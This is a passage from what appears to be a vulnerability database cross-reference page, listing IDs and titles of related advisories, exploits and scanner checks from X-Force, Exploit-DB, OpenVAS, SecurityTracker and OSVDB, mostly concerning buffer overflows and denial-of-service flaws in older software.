1.0r5 Buffer Overflow Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [28893] Microsoft Internet Explorer HTTP 1.1 compression long URL buffer overflow variant [28522] Microsoft Internet Explorer HTTP 1.1 compression long URL buffer overflow [24472] Microsoft Windows 2000 Event ID 1704 records incorrect group policy settings [15709] Microsoft Windows COM Internet Service and RPC over HTTP denial of service [10400] Microsoft Windows 2000 RPC TCP port 135 denial of service [82776] Microsoft Internet Explorer 10 on Windows 8 sandbox security bypass [66413] Microsoft Windows kernel-mode driver (win32k.sys) variant 19 privilege escalation [66412] Microsoft Windows kernel-mode driver (win32k.sys) variant 18 privilege escalation [66411] Microsoft Windows kernel-mode driver (win32k.sys) variant 17 privilege escalation [66410] Microsoft Windows kernel-mode driver (win32k.sys) variant 16 privilege escalation [66409] Microsoft Windows kernel-mode driver (win32k.sys) variant 15 privilege escalation [66408] Microsoft Windows kernel-mode driver (win32k.sys) variant 14 privilege escalation [66407] Microsoft Windows kernel-mode driver (win32k.sys) variant 13 privilege escalation [66406] Microsoft Windows kernel-mode driver (win32k.sys) variant 12 privilege escalation [66405] Microsoft Windows kernel-mode driver (win32k.sys) variant 11 privilege escalation [66404] Microsoft Windows kernel-mode driver (win32k.sys) variant 10 privilege escalation [66395] Microsoft Windows kernel-mode driver (win32k.sys) variant 1 privilege escalation [46099] Microsoft Windows XP Service Pack 1 is not installed on the system [33629] Microsoft Windows DNS Server RPC interface buffer overflow [33268] Microsoft Windows Universal Plug and Play HTTP buffer overflow [32028] Computer Associates (CA) BrightStor ARCserve Backup LGSERVER.EXE port 1900 buffer overflow [29239] Microsoft Excel Lotus 1-2-3 file buffer overflow [27832] Microsoft Windows ASN.1 Library HTTP NTLM buffer overflow [24491] Microsoft Windows MSRPC WebClient service message buffer overflow [22481] Microsoft Windows MSRPC Plug and Play buffer overflow [21345] Microsoft Windows 2000 Update Rollup 1 for Service Pack 4 has not been installed [16208] Microsoft Windows RPC Locator Service buffer overflow exploit attempt detected [13129] Microsoft Windows RPCSS DCOM buffer overflows [12747] Microsoft Windows RPC DCOM interface buffer overflow detected [10132] Microsoft Windows fails to properly check execute permissions for 16-bit executable files [10107] Trend Micro InterScan VirusWall HTTP 1.0 gzip content encoding protection bypass [3149] The Unexplained 1.0 backdoor for Windows 95/98 and Windows NT [295] WebSite 1.1 for Windows NT winsample buffer overflow Exploit-DB - https://www.exploit-db.com: [27476] Microsoft .NET Framework SDK 1.0/1.1 MSIL Tools Buffer Overflow Vulnerabilities [26520] Static HTTP Server 1.0 - SEH Overflow [25962] Microsoft ASP.NET 1.0/1.1 RPC/Encoded Remote Denial of Service Vulnerability [23714] KarjaSoft Sami HTTP Server 1.0.4 GET Request Buffer Overflow Vulnerability [23493] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (3) [23492] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (2) [23491] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (1) [22610] Snowblind Web Server 1.0/1.1 HTTP GET Request Buffer Overflow Vulnerability [20457] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_peekqueue Buffer Overflow Vulnerability [20456] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_showcolv Buffer Overflow Vulnerability [20451] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_displayparamstmt Buffer Overflow Vulnerability [19516] Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow [4394] Microsoft Visual Studio 6.0 (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit [31040] Toshiba Surveillance Surveillix DVR 'MeIpCamX.DLL' 1.0 ActiveX Control Buffer Overflow Vulnerabilities [30578] MPlayer 1.0 AVIHeader.C Heap Based Buffer Overflow Vulnerability [30562] Move Media Player 1.0 Quantum Streaming ActiveX Control Multiple Buffer Overflow Vulnerabilities [30462] Microsoft Windows Media Player 11 - AU Divide-By-Zero Denial of Service Vulnerability [29919] TP-Link TL-WR740N / TL-WR740ND - 150M Wireless Lite N Router HTTP DoS [29803] Static Http Server 1.0 - Denial of Service (DoS) Exploit [29735] D-Link TFTP 1.0 Transporting Mode Remote Buffer Overflow Vulnerability [29671] Avira Secure Backup 1.0.0.1 Build 3616 (.reg) - Buffer Overflow [29503] KarjaSoft Sami HTTP Server 1.0.4/1.0.5/2.0.1 Request Remote Denial of Service Vulnerability [29305] FTPRush 1.0 .610 Host Field Local Buffer Overflow Vulnerability [28850] Cruiseworks 1.09 Cws.exe Doc Buffer Overflow Vulnerability [28595] BusyBox 1.01 HTTPD Directory Traversal Vulnerability [28568] NX5Linkx 1.0 Links.PHP HTTP Response Splitting Vulnerability [28170] freeFTPd 1.0.10 PASS Command SEH Overflow (msf) [27747] freeFTPd 1.0.10 (PASS Command) - SEH Buffer Overflow [27606] Intrasrv 1.0 - Buffer Overflow [27569] UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (2) [27568] UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (1) [27108] Dual DHCP DNS Server 1.0 DHCP Options Remote Buffer Overflow Vulnerability [26739] Ultra Mini HTTPD 1.21 - Stack Buffer Overflow [26691] WebCalendar 1.0.1 Layers_Toggle.PHP HTTP Response Splitting Vulnerability [25975] MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution [25933] slimserve httpd 1.0/1.1 - Directory Traversal vulnerability [25851] Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow [25547] Convert-UUlib 1.04/1.05 Perl Module Buffer Overflow Vulnerability [25329] Star Wars Jedi Knight: Jedi Academy 1.0.11 Buffer Overflow Vulnerability [25191] JoWood Chaser 1.0/1.50 Remote Buffer Overflow Vulnerability [25130] FuzeZip 1.0.0.131625 - SEH Buffer Overflow [25110] Microsoft ASP.NET 1.0/1.1 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities [25011] HTML2HDML 1.0.3 - File Conversion Buffer Overflow Vulnerability [25006] RTF2LATEX2E 1.0 Stack Buffer Overflow Vulnerability [24897] KNet Web Server 1.04b - Buffer Overflow SEH [24880] IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow Vulnerability [24479] FreeFloat FTP 1.0 Raw Commands Buffer Overflow [24371] MapInfo Discovery 1.0/1.1 Administrative Login Bypass [24370] MapInfo Discovery 1.0/1.1 Cleartext Transmission Credential Disclosure [24369] MapInfo Discovery 1.0/1.1 MapFrame.asp mapname Parameter XSS [24368] MapInfo Discovery 1.0/1.1 - Remote Log File Access Information Disclosure [24165] Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun Vulnerability [24103] MailEnable Mail Server HTTPMail 1.x Remote Heap Overflow Vulnerability [23709] RobotFTP Server 1.0/2.0 Username Buffer Overflow Vulnerability (2) [23708] RobotFTP Server 1.0/2.0 Username Buffer Overflow Vulnerability (1) [23514] Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server Buffer Overflow Vulnerability [23510] XSOK 1.0 2 LANG Environment Variable Local Buffer Overrun Vulnerability [23480] Surfboard httpd 1.1.9 - Remote Buffer Overflow Vulnerability [23397] Monit 1.4/2.x/3/4 Overly Long HTTP Request Buffer Overrun Vulnerability [23366] Epic 1.0.1/1.0.x CTCP Nickname Server Message Buffer Overrun Vulnerability [23325] BRS WebWeaver 1.06 httpd `User-Agent` Remote Denial of Service Vulnerability [23246] Sumatra 2.1.1/MuPDF 1.0 Integer Overflow [23189] marbles 1.0.1 - Local Home Environment Variable Buffer Overflow Vulnerability [23166] Plug And Play Web Server 1.0 002c FTP Service Command Handler Buffer Overflow Vulnerabilities [22985] Xtokkaetama 1.0 b-6 Nickname Local Buffer Overflow Vulnerability (2) [22984] Xtokkaetama 1.0 b-6 Nickname Local Buffer Overflow Vulnerability (1) [22917] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability [22909] NetSuite 1.0/1.2 HTTP Server Directory Traversal Vulnerability [22892] Mabry Software HTTPServer/X 1.0 0.047 File Disclosure Vulnerability [22835] Tripbit Secure Code Analizer 1.0 - Local fgets() Buffer Overrun [22659] Batalla Naval 1.0 4 Remote Buffer Overflow Vulnerability (2) [22658] Batalla Naval 1.0 4 Remote Buffer Overflow Vulnerability (1) [22608] Snowblind Web Server 1.0/1.1 Malformed HTTP Request Denial of Service Vulnerability [22593] Yahoo! Voice Chat ActiveX Control 1.0 .0.43 Buffer Overflow Vulnerability [22580] Firebird 1.0 GDS_Inet_Server Interbase Environment Variable Buffer Overflow Vulnerability [22479] PoPToP PPTP 1.0/1.1.x Negative read() Argument Remote Buffer Overflow Vulnerability [22220] ByteCatcher FTP Client 1.0.4 Long Server Banner Buffer Overflow Vulnerability [22053] Moby NetSuite 1.0/1.2 POST Handler Buffer Overflow Vulnerability [22021] Lonerunner Zeroo HTTP Server 1.5 - Remote Buffer Overflow Vulnerability [22016] LibHTTPD 1.2 POST Buffer Overflow Vulnerability [21973] SmartMail Server 1.0 BETA 10 Oversized Request Denial of Service Vulnerability [21955] AN HTTPD 1.38/1.39/1.40/1.41 Malformed SOCKS4 Request Buffer Overflow Vulnerability [21937] ghttpd 1.4.x Log() Function Buffer Overflow Vulnerability [21710] MyWebServer 1.0.2 Long HTTP Request HTML Injection Vulnerability [21709] MyWebServer 1.0.2 Search Request Remote Buffer Overflow Vulnerability [21683] qmailadmin 1.0.x Local Buffer Overflow Vulnerability [21615] Real Networks RealJukebox 1.0.2/RealOne 6.0.10 Player Gold Skinfile Buffer Overflow [21342] Ecartis 1.0 .0,0.129 a Listar Multiple Local Buffer Overflow Vulnerabilities (2) [21294] Phusion Webserver 1.0 Long URL Buffer Overflow Vulnerability [21142] Ipswitch WS_FTP Server 1.0.x/2.0.x 'STAT' Buffer Overflow Vulnerability [21050] NCSA httpd 1.x Buffer Overflow Vulnerability (2) [21049] NCSA httpd 1.x Buffer Overflow Vulnerability (1) [20936] NetSQL 1.0 - Remote Buffer Overflow Vulnerability [20929] ghttpd 1.4 Daemon Buffer Overflow Vulnerability [20879] OpenServer 5.0.5/5.0.6,HP-UX 10/11,Solaris 2.6/7.0/8 rpc.yppasswdd Buffer Overrun [20689] SWSoft ASPSeek 1.0 s.cgi Buffer Overflow Vulnerability [20657] robin twombly a1 http server 1.0 - Directory Traversal vulnerability [20656] Robin Twombly A1 HTTP Server 1.0 - Denial of Service Vulnerability [20634] John Roy Pi3Web 1.0.1 - Buffer Overflow Vulnerability [20600] SmartMax MailMax 1.0 SMTP Buffer Overflow Vulnerability [20490] BitchX IRC Client 1.0 c17 DNS Buffer Overflow Vulnerability [20449] GlimpseHTTP 1.0/2.0 and WebGlimpse 1.0 Piped Command Vulnerability [20184] eEye Digital Security IRIS 1.0.1,SpyNet CaptureNet 3.0.12 Buffer Overflow [20180] RobTex Viking Server 1.0.6 Build 355 Buffer Overflow Vulnerability [20134] NAI Net Tools PKI Server 1.0 strong.exe Buffer Overflow Vulnerability [20120] httpdx <= 1.5.4 - Remote Heap Overflow [20054] West Street Software LocalWEB HTTP Server 1.2 - Buffer Overflow [20017] Max Feoktistov Small HTTP server 1.212 Buffer Overflow [19978] Atrus Trivalie Productions Simple Network Time Sync 1.0 daemon Buffer Overflow [19949] Gauntlet Firewall 4.1/4.2/5.0,WebShield E-ppliance 100.0/300.0,IRIX 6.5.x Remote Buffer Overflow [19948] gdm 1.0 .x/2.0 .x BETA/2.2 .0 XDMCP Buffer Overflow Vulnerability (2) [19947] gdm 1.0 .x/2.0 .x BETA/2.2 .0 XDMCP Buffer Overflow Vulnerability (1) [19928] Microsoft Active Movie Control 1.0 Filetype Vulnerability [19918] Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (3) [19917] Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (2) [19916] Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (1) [19866] DomsHttpd <= 1.0 - Remote Denial of Service Exploit [19846] MS FrontPage 98 Server Extensions for IIS,MS InterDev 1.0 - Buffer Overflow Vulnerability [19810] Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow [19803] Sam Hawker wmcdplay 1.0 beta1-2 Buffer Overflow Vulnerability (2) [19802] Sam Hawker wmcdplay 1.0 beta1-2 Buffer Overflow Vulnerability (1) [19703] AnalogX SimpleServer:WWW 1.0.1 GET Buffer Overflow Vulnerability [19667] WolfPack Development XSHIPWARS 1.0/1.2.4 - Buffer Overflow Vulnerability [19621] Admiral Systems EmailClub 1.0 .0.5 - Buffer Overflow Vulnerability [19588] IBM HomePagePrint 1.0 7 Buffer Overflow Vulnerability [19586] BTD Studio Zom-Mail 1.0.9 - Buffer Overflow Vulnerability [19566] Omnicron OmniHTTPD 1.1/2.4 Pro Buffer Overflow Vulnerability [19547] BSD/OS 2.1/3.0,Larry Wall Perl 5.0 03,RedHat 4.0/4.1,SGI Freeware 1.0/2.0 suidperl Overflow(2) [19546] BSD/OS 2.1/3.0,Larry Wall Perl 5.0 03,RedHat 4.0/4.1,SGI Freeware 1.0/2.0 suidperl Overflow(1) [19512] Mandriva Linux Mandrake 6.0,Gnome Libs 1.0.8 espeaker Local Buffer Overflow [19449] "Fujitsu Chocoa 1.0 beta7R ""Topic"" Buffer Overflow Vulnerability" [19445] Microsoft FrontPage Personal WebServer 1.0 PWS DoS Vulnerability [19440] Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 Malformed Dialer Entry Vulnerability [19421] Caldera OpenUnix 8.0/UnixWare 7.1.1,HP HP-UX <= 11.0,Solaris <= 7.0,SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (2) [19420] Caldera OpenUnix 8.0/UnixWare 7.1.1,HP HP-UX <= 11.0,Solaris <= 7.0,SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (1) [19372] Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name Vulnerability [19371] VMWare 1.0.1 - Buffer Overflow Vulnerability [19144] Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor Vulnerability [19112] BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC BIND <= 8.1.1,NetBSD <= 1.3.1,RedHat Linux <= 5.0,SCO Open Desktop 3.0/Server 5.0,Unixware 2.1/7.0,SGI IRIX <= 6.3,Solaris <= 2.5.1 BIND buffer overflow(2) [19111] BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC BIND <= 8.1.1,NetBSD <= 1.3.1,RedHat Linux <= 5.0,SCO Open Desktop 3.0/Server 5.0,Unixware 2.1/7.0,SGI IRIX <= 6.3,Solaris <= 2.5.1 BIND buffer overflow(1) [19103] HP HP-UX <= 10.34,Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 [19102] Xi Graphics Maximum CDE 1.2.3,TriTeal TED CDE 4.3,Sun Solaris <= 2.5.1 ToolTalk RPC Service Overflow Vulnerability (2) [19101] Xi Graphics Maximum CDE 1.2.3,TriTeal TED CDE 4.3,Sun Solaris <= 2.5.1 ToolTalk RPC Service Overflow Vulnerability (1) [18759] TFTP Server for Windows 1.4 ST WRQ Buffer Overflow [18666] UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow [18109] Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow [18089] KnFTP 1.0 - Buffer Overflow Exploit - DEP Bypass [17890] GMER 1.0.15.15641 MFT Overwrite [17870] KnFTP 1.0.0 Server - Remote Buffer Overflow Exploit, 'USER' command [17856] KnFTP 1.0.0 Server Multiple Buffer Overflow Exploit (DoS PoC) [17783] ZipX for Windows 1.71 ZIP File - Buffer Overflow Exploit [17669] Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability [17550] FreeFloat FTP Server 1.0 - ACCL Buffer Overflow Exploit [17546] FreeFloat FTP Server 1.0 - REST, PASV Buffer Overflow Exploit [17539] FreeFloat FTP Server 1.00 - MKD Buffer Overflow Exploit [17489] Word List Builder 1.0 - Buffer Overflow Exploit (MSF) [17229] MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow [16819] SoftiaCom WMailserver 1.0 - Buffer Overflow [16759] SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32) [16707] freeFTPd 1.0 Username Overflow [16663] S.O.M.P.L 1.0 Player Buffer Overflow [16662] A-PDF WAV to MP3 1.0.0 - Buffer Overflow [16653] Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow [16646] HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow [16490] UltraVNC 1.0.1 Client Buffer Overflow [16462] FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow [16461] FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow [16353] AIM Triton 1.0.4 CSeq Buffer Overflow [16345] D-Link TFTP 1.0 Long Filename Buffer Overflow [15599] Xion Audio Player 1.0.127 - (m3u) Buffer Overflow Vulnerability [15598] Xion Audio Player 1.0.126 (.m3u8) Buffer Overflow Vulnerability [15337] DATAC RealWin SCADA 1.06 Buffer Overflow Exploit [14904] FCrackZip 1.0 - Local Buffer Overflow Proof of Concept [14676] A-PDF WAV to MP3 Converter 1.0.0 (.m3u) Stack Buffer Overflow [14633] Xion Player 1.0.125 Stack Buffer Overflow Exploit [14496] UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post Auth) [13940] Orbital Viewer 1.04 - (.ov) Local Universal Stack Overflow Exploit (SEH) [13909] Batch Audio Converter Lite Edition <= 1.0.0.0 - Stack Buffer Overflow (SEH) [12803] IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow [12293] TweakFS 1.0 (FSX Edition) Stack buffer overflow [12273] Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC [11713] Yahoo Player 1.0 - (.m3u) Buffer Overflow Exploit [11647] Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH) [11628] AKoff MIDI Player 1.00 - Buffer Overflow Exploit [11608] iPhone / iTouch FTPDisc 1.0 3 ExploitsInOne Buffer Overflow DoS [11581] Orbital Viewer 1.04 - (.orb) Local Universal SEH Overflow Exploit (0day) [11531] Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit [11475] OtsTurntables Free 1.00.047 - (.olf) Universal Buffer Overflow Exploit [11266] KOL Wave Player 1.0 (.wav) Local Buffer Overflow PoC [11265] KOL WaveIOX 1.04 (.wav) Local Buffer Overflow PoC [11145] OtsTurntables Free 1.00.047 - SEH Overwrite PoC [10334] VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux) [10333] VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC [10053] httpdx 1.4 Get Request Buffer Overflow [10047] Femitter HTTP Server 1.03 Remote Source Disclosure [10028] Linksys WRT54G < 4.20.7 , WRT54GS < 1.05.2 apply.cgi Buffer Overflow [10023] Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow [9983] Xion Audio Player 1.0 121 m3u file buffer overflow [9935] Subversion 1.0.2 - Date Overflow [9851] Xion Audio Player 1.0 121 .m3u file Buffer Overflow [9816] VLC Media Player 1.0.2 smb:// URI stack overflow PoC [9661] MP3 Studio 1.0 (.m3u File) Local Buffer Overflow Exploit [9660] Techlogica HTTP Server 1.03 Arbitrary File Disclosure Exploit [9546] Swift Ultralite 1.032 (.M3U) Local Buffer Overflow PoC [9480] GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC [9467] KOL Player 1.0 (.mp3 File) Local Buffer Overflow PoC [9457] broid 1.0 Beta 3a (.mp3 File) Local Buffer Overflow PoC [9298] Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit (update) [9286] MP3 Studio 1.0 (.mpf /.m3u File) Local Stack Overflow Exploit (SEH) [9277] MP3 Studio 1.0 (.mpf /.m3u File) Local Stack Overflow PoC [9216] Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow Exploit (SEH) [9192] Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow PoC (SEH) [9114] eEye Retina WiFi Security Scanner 1.0 (.rws Parsing) Buffer Overflow PoC [9093] windows live messenger plus! fileserver 1.0 - Directory Traversal vuln [9061] PEamp 1.02b (.M3U File) Local Buffer Overflow PoC [9038] HT-MP3Player 1.0 (.ht3) Universal Buffer Overflow (SEH) [9034] HT-MP3Player 1.0 (.ht3 File) Local Buffer Overflow Exploit (SEH) [8677] DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs [8624] Soritong MP3 Player 1.0 - Local Buffer Overflow Exploit (SEH) [8592] Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit #3 [8591] Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit #2 [8590] Beatport Player 1.0.0.283 (.m3u) Local SEH Overwrite Exploit [8588] Beatport Player 1.0.0.283 (.M3U File) Local Buffer Overflow PoC [8360] Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC [8225] Gretech GOM Encoder 1.0.0.11 (Subtitle File) Buffer Overflow PoC [8201] Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit (Univ.) [8171] Nokia Multimedia Player 1.0 (playlist) Universal SEH Overwrite Exploit [7974] Euphonics Audio Player 1.0 (.pls) Local Buffer Overflow Exploit (xp/sp3) [7973] Euphonics Audio Player 1.0 (.pls) Universal Local Buffer Overflow Exploit [7958] Euphonics Audio Player 1.0 - (.pls) Local Buffer Overflow Exploit [7913] WFTPD Explorer Pro 1.0 - Remote Heap Overflow Exploit [7812] MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC [7765] OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit [5951] XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC [5827] Alt-N SecurityGateway 1.00-1.01 Remote Stack Overflow Exploit [5718] SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC [5563] TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit [5314] TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day) [5086] ImageStation (SonyISUpload.cab 1.0.0.38) ActiveX Buffer Overflow PoC [5032] Total Video Player 1.03 M3U File Local Buffer Overflow Exploit [4948] Windows RSH daemon <= 1.8 - Remote Buffer Overflow Exploit [4801] SkyFex Client 1.0 ActiveX Start() Method Remote Stack Overflow [4742] WFTPD Explorer Pro 1.0 - Remote Heap Overflow PoC [4579] GOM Player 2.1.6.3499 (GomWeb3.dll 1.0.0.12) Remote Overflow Exploit [4437] Lighttpd <= 1.4.17 FastCGI Header Overflow Remote Exploit [4391] Lighttpd <= 1.4.16 FastCGI Header Overflow Remote Exploit [4355] OTSTurntables 1.00 (m3u File) Local Buffer Overflow Exploit [4222] Windows RSH daemon 1.7 - Remote Buffer Overflow Exploit [4120] Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow PoC [3973] Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote DoS Exploit [3898] Hewlett Packard 1.0.0.309 hpqvwocx.dll ActiveX Magview Overflow PoC [3746] Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2) [3675] FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit (2) [2974] Http explorer Web Server 1.02 Directory Transversal Vulnerability [2597] Asterisk <= 1.0.12 / 1.2.12.1 (chan_skinny) Remote Heap Overflow (PoC) [2482] SHTTPD 1.34 (POST) Remote Buffer Overflow Exploit [2277] Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit 2 [2274] Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit [2076] AIM Triton 1.0.4 (SipXtapi) Remote Buffer Overflow Exploit (PoC) [2047] FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit [1787] freeSSHd <= 1.0.9 Key Exchange Algorithm Buffer Overflow Exploit [1664] Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit [1643] Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow PoC [1642] Ultr@VNC <= 1.0.1 VNCLog::ReallyPrint Remote Buffer Overflow PoC [1552] XM Easy Personal FTP Server 1.0 (Port) Remote Overflow PoC [1505] MS Windows Media Player 10 Plugin Overflow Exploit (MS06-006) [1502] Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2) [1500] Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) [1463] SoftiaCom WMailserver 1.0 SMTP Remote Buffer Overflow Exploit (meta) [1373] Limbo <= 1.0.4.2 _SERVER[REMOTE_ADDR] Overwrite Remote Exploit [1330] FreeFTPD <= 1.0.8 (USER) Remote Buffer Overflow Exploit [1284] Glider collectn kill <= 1.0.0.0 - Buffer Overflow (PoC) [1245] versatileBulletinBoard 1.00 RC2 (board takeover) SQL Injection Exploit [1233] Mozilla Firefox <= 1.0.7 - Integer Overflow Denial of Service Exploit [1089] Mozilla FireFox <= 1.0.1 - Remote GIF Heap Overflow Exploit [950] BitchX <= 1.0c20 Local Buffer Overflow Exploit [949] PMsoftware Simple Web Server 1.0 - Remote Stack Overflow Exploit [843] Knet <= 1.04c Buffer Overflow Denial of Service Exploit [604] Age of Sail II <= 1.04.151 Remote Buffer Overflow Exploit [558] WinRAR 1.0 - Local Buffer Overflow Exploit [308] MPlayer <= 1.0pre4 GUI filename handling Overflow Exploit [180] GnomeHack 1.0.5 - Local Buffer Overflow Exploit [140] "Xsok 1.02 - ""-xsokdir"" Local Buffer Overflow Game Exploit" [88] GtkFtpd 1.0.4 - Remote Root Buffer Overflow Exploit [77] Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit OpenVAS (Nessus) - http://www.openvas.org: [11127] HTTP 1.0 header overflow [855770] Solaris Update for rpc.nisd 140917-02 [855741] Solaris Update for rpc.nisd 140918-02 [855685] Solaris Update for rpc.nisd 140917-01 [855672] Solaris Update for rpc.nisd 140918-01 [855385] Solaris Update for rpc.ypupdated 140102-01 [855057] Solaris Update for OpenWindows 3.6.2 110286-16 [855014] Solaris Update for usr/sbin/rpc.metad 140106-01 [61357] Debian Security Advisory DSA 1609-1 (lighttpd) [57684] Debian Security Advisory DSA 1205-2 (thttpd) [11129] HTTP 1.1 header overflow SecurityTracker - https://www.securitytracker.com: [1016731] Microsoft Internet Explorer URL Buffer Overflow in Processing HTTP 1.1 Protocol with Compression Lets Remote Users Execute Arbitrary Code [1009762] Microsoft Windows COM Internet Services and RPC over HTTP Can Be Crashed By Remote Users [1017910] Microsoft Windows DNS Service RPC Stack Overflow Lets Remote Users Execute Arbitrary Code [1007670] Microsoft Windows Remote Procedure Call (RPC) DCOM Activation Buffer Overflows Let Remote Users Execute Arbitrary Code [1007212] Microsoft Windows Remote Procedure Call (RPC) Service Buffer Overflow in Processing DCOM Requests Allows Remote Code Execution [1004100] Buffer Overflow in Solaris Event Detector Daemon (edd) for Enterprise 10000 SSP Server May Let Remote Users Gain Root Access to the System [1002752] Cisco 12000 Series Internet Routers Can Be Degraded or Crashed By Remote Users Due to CPU Overloading in Generating ICMP Unreachable Messages [1002693] Microsoft Internet Security and Acceleration Server UDP Fragmentation Processing Can Cause 100% of CPU Resources to Be Consumed OSVDB - http://www.osvdb.org: [71671] Microsoft Windows afd.sys 120CFh IOCTL Handling Local DoS [28132] Microsoft IE HTTP 1.1 URL Parsing Overflow [19996] Microsoft Windows 2000 Event ID 1704 Group Policy Failure [5246] Microsoft Windows CIS/RPC Over HTTP DoS [84399] Huawei AR 18 / 29 Routers HTTP Server Pre-auth Multiple URL Handling Remote Overflow [83859] Solaris rpc.ttdbserver Function 15 Handling Overflow Remote DoS [79018] Links HTTP 100 Response Handling DoS [74826] Pidgin libpurple MSN Protocol Plugin httpconn.c msn_httpconn_parse_data Function HTTP 100 Response Remote DoS [68570] Microsoft Office Excel Lotus 1-2-3 Workbook Parsing Remote Overflow [68532] Microsoft Windows rpcrt4.dll LRPC_SCALL::SendRequest() Function LPC Message Local Overflow DoS [60273] Microsoft Windows NT Virtual DOS Machine 16-bit Executable Permission Bypass Local Privilege Escalation [59855] Microsoft Windows License Logging Server (llssrv.exe) RPC LlsrLicenseRequestW Method Remote Overflow [53309] Microsoft Windows WINS 1Ch Registration Domain Controller Manipulation [34100] Microsoft Windows DNS RPC Interface Zone Name Remote Overflow [31607] Microsoft Visual Studio 1 TYPELIB MOVEABLE PURE .rc File Name Overflow [29409] Microsoft Windows TCP 135 Crafted Packet Saturation DoS [27845] Microsoft Windows Server Service Crafted RPC Message Remote Overflow [26436] Microsoft Windows RASMAN RPC Request Remote Overflow [25335] Microsoft Windows Distributed Transaction Coordinator (DTC) CRpcIoManagerServer::BuildContext Function Remote Overflow [11797] Microsoft Windows DCOM RPCSS Service DCERPC Packet Overflow [9020] Multiple Vendor lpr 1000x Symlink Arbitrary File Create/Overwrite [8854] Cisco CSS 11000 Web Interface HTTPS POST DoS [7117] Microsoft Windows RPC Locator Remote Overflow [2535] Microsoft Windows DCOM RPCSS Service Filename Parameter Overflow 